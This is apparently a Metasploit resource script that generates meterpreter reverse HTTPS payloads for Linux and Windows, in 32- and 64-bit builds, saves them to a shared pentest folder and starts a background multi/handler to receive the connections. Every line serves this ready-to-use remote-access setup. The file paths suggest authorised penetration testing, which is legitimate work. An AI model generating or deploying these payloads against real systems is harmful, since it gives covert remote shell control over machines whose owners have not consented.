jobs -K

setg LPORT 443
setg PayloadUUIDTracking true
setg HandlerSSLCert /certs/cert.pem
setg StagerVerifySSLCert true
setg IgnoreUnknownPayloads true
setg LURI /multi

# TODO clever user-agents so we know what's trying to connect to us

use payload/linux/x64/meterpreter_reverse_https
set PayloadUUIDName ParanoidStagedElf64
generate -t elf -f /pentest/share/reverse.http.linux_amd64
chmod 755 /pentest/share/reverse.http.linux_amd64

use payload/linux/x86/meterpreter_reverse_https
set PayloadUUIDName ParanoidStagedElf32
generate -t elf -f /pentest/share/reverse.http.linux_i386
chmod 755 /pentest/share/reverse.http.linux_i386

# these have to be staged: https://github.com/rapid7/metasploit-framework/issues/6364
use payload/windows/x64/meterpreter/reverse_winhttps
set PayloadUUIDName ParanoidStagedExe64
generate -t exe -f /pentest/share/reverse.http.windows_amd64.exe
generate -t hex -f /pentest/share/reverse.http.windows_amd64.hex

use payload/windows/meterpreter/reverse_winhttps
set PayloadUUIDName ParanoidStagedExe32
generate -t exe -f /pentest/share/reverse.http.windows_i386.exe
generate -t hex -f /pentest/share/reverse.http.windows_i386.hex

use exploit/multi/handler
set PAYLOAD multi/meterpreter/reverse_https
set ExitOnSession false
exploit -j

back
